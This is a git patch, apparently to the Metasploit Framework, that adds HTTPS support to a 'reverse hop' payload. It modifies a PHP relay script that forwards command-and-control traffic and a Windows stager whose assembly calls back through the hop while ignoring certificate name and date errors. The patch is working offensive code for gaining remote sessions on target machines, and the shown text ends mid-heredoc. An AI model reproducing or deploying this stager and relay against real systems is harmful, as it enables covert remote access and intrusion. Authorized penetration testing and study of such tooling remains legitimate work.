From 8703987535212d0dcb631731f6cfd326cd8acc78 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Wed, 11 Nov 2015 21:18:39 -0600 Subject: [PATCH] Add HTTPS and new transport support for hop --- data/php/hop.php | 2 +- lib/msf/core/handler/reverse_hop_http.rb | 23 ++++++- lib/msf/core/payload/transport_config.rb | 4 +- .../stagers/windows/reverse_hop_http.rb | 60 ++++++++++++++++--- 4 files changed, 75 insertions(+), 14 deletions(-) diff --git a/data/php/hop.php b/data/php/hop.php index 948ccfe7d2..d2c289a3b5 100644 --- a/data/php/hop.php +++ b/data/php/hop.php @@ -45,7 +45,7 @@ if($url === "/control"){ //get data $postdata = file_get_contents("php://input"); //See if we should send anything down - if($postdata === "RECV\x00"){ + if($postdata === "RECV\x00" || $postdata === "RECV"){ findSendDelete($tempdir, "down_" . sha1($url)); $fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll }else{ diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 138a373e6c..097219cd9b 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -82,7 +82,8 @@ module ReverseHopHttp uri.port, { 'Msf' => framework - } + }, + full_uri.start_with?('https') ) @running = true # So we know we can stop it # If someone is already monitoring this hop, bump the refcount instead of starting a new thread @@ -185,6 +186,19 @@ module ReverseHopHttp lock.unlock end + # + # Implemented for compatibility reasons + # + def resources + handlers + end + + # + # Implemented for compatibility reasons, does nothing + # + def deref + end + # # Implemented for compatibility reasons, does nothing # @@ -250,7 +264,7 @@ module ReverseHopHttp # def send_new_stage(uri) # try to get the UUID out of the existing URI - info = process_uri_resource(uri) + info = process_uri_resource(uri.to_s) uuid = info[:uuid] || Msf::Payload::UUID.new # generate a new connect @@ -258,11 +272,14 @@ module ReverseHopHttp conn_id = generate_uri_uuid(sum, uuid) conn_id = conn_id[1..-1] if conn_id.start_with? '/' url = full_uri + conn_id + "/\x00" + fulluri = URI(full_uri + conn_id) print_status("Preparing stage for next session #{conn_id}") blob = stage_payload( uuid: uuid, - uri: conn_id + uri: fulluri.request_uri, + lhost: uri.host, + lport: uri.port ) #send up diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 0e7d49bdc3..03820247d6 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -55,8 +55,8 @@ module Msf::Payload::TransportConfig { :scheme => 'http', - :lhost => datastore['LHOST'], - :lport => datastore['LPORT'].to_i, + :lhost => opts[:lhost] || datastore['LHOST'], + :lport => opts[:lport] || datastore['LPORT'].to_i, :uri => uri, :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, :retry_total => datastore['SessionRetryTotal'].to_i, diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 138785a4da..229d85f518 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -16,13 +16,14 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, - 'Name' => 'Reverse Hop HTTP Stager', + 'Name' => 'Reverse Hop HTTP/HTTPS Stager', 'Description' => %q{ - Tunnel communication over an HTTP hop point. Note that you must first upload + Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop. }, 'Author' => [ 'scriptjunkie ', + 'bannedit', 'hdm' ], 'License' => MSF_LICENSE, @@ -48,6 +49,15 @@ module Metasploit3 false end + # + # Generate the transport-specific configuration + # + def transport_config(opts={}) + config = transport_config_reverse_http(opts) + config[:scheme] = URI(datastore['HOPURL']).scheme + config + end + # # Generate the first stage # @@ -188,12 +198,24 @@ httpopenrequest: pop ecx xor edx, edx ; NULL push edx ; dwContext (NULL) - push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags - ;0x80000000 | ; INTERNET_FLAG_RELOAD - ;0x04000000 | ; INTERNET_NO_CACHE_WRITE - ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT - ;0x00000200 | ; INTERNET_FLAG_NO_UI - ;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION +EOS + + if uri.scheme == 'http' + payload_data << ' push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags' + else + payload_data << ' push (0x80000000 | 0x00800000 | 0x00001000 | 0x00002000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags' + end + # 0x80000000 | ; INTERNET_FLAG_RELOAD + # 0x00800000 | ; INTERNET_FLAG_SECURE + # 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID + # 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID + # 0x80000000 | ; INTERNET_FLAG_RELOAD + # 0x04000000 | ; INTERNET_NO_CACHE_WRITE + # 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + # 0x00000200 | ; INTERNET_FLAG_NO_UI + # 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION + payload_data << <